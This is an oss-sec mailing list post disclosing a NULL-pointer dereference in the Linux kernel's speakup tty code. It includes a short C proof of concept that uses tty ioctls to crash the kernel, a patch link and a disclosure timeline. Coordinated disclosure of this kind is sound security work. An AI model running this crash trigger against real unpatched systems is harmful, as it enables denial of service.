oss-sec mailing list archives
Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2
From: Shisong Qin <qinshisong1205 () gmail com>
Date: Mon, 7 Dec 2020 10:20:44 +0800
Hi, Recently we found another NULL-ptr deref BUG in spk_ttyio.c in the latest Linux kernel(5.9.11 is the latest at that now). In the spk_ttyio_receive_buf2() function, it would dereference spk_ttyio_synth without checking whether it is NULL or not, and may lead to a NULL-ptr deref crash. This bug could be reproduced in the Linux kernel (e.g. 5.9.11) with CONFIG_ACCESSIBILITY=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y, and here is a simple poc: #define _GNU_SOURCE #include <dirent.h> #include <endian.h> #include <errno.h> #include <fcntl.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #pragma pack(1) typedef struct { char subcode; short xs, ys, xe, ye; short sel_mode; } sel_struct; int main(int argc, char const *argv[]) { int disc = 0x1a; int fd = open("/dev/tty1", 0, 0); ioctl(fd, 0x5423, &disc); sel_struct sel; sel.subcode = 2; sel.xs = sel.ys = sel.xe = sel.ye = 0; sel.sel_mode = 0x0; // sel_mode = 0x0/0x1/0x2 could trigger this NULL-ptr dereference bug ioctl(fd, 0x541c, &sel); char data = 3; ioctl(fd, 0x541c, &data); return 0; } Here is the commit to patch this BUG: https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc.git/commit/?h=char-misc-linus&id=f0992098cadb4c9c6a00703b66cafe604e178fea Timeline: * 2020/11/24 - Vulnerability reported to security () kernel org * 2020/11/29 - Vulnerability confirmed, and reported to linux-distros () vs openwall org. * 2020/12/7 - Vulnerability opened. Thanks, Shisong Qin and Bodong Zhao, Tsinghua University
Current thread:
- Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 Shisong Qin (Dec 06)
- Re: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 John Haxby (Dec 07)
- Re: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 - Nop (Dec 07)
- Re: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 Marcus Meissner (Dec 07)
- Re: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 - Nop (Dec 08)
- Re: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 - Nop (Dec 07)
- Re: Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2 John Haxby (Dec 07)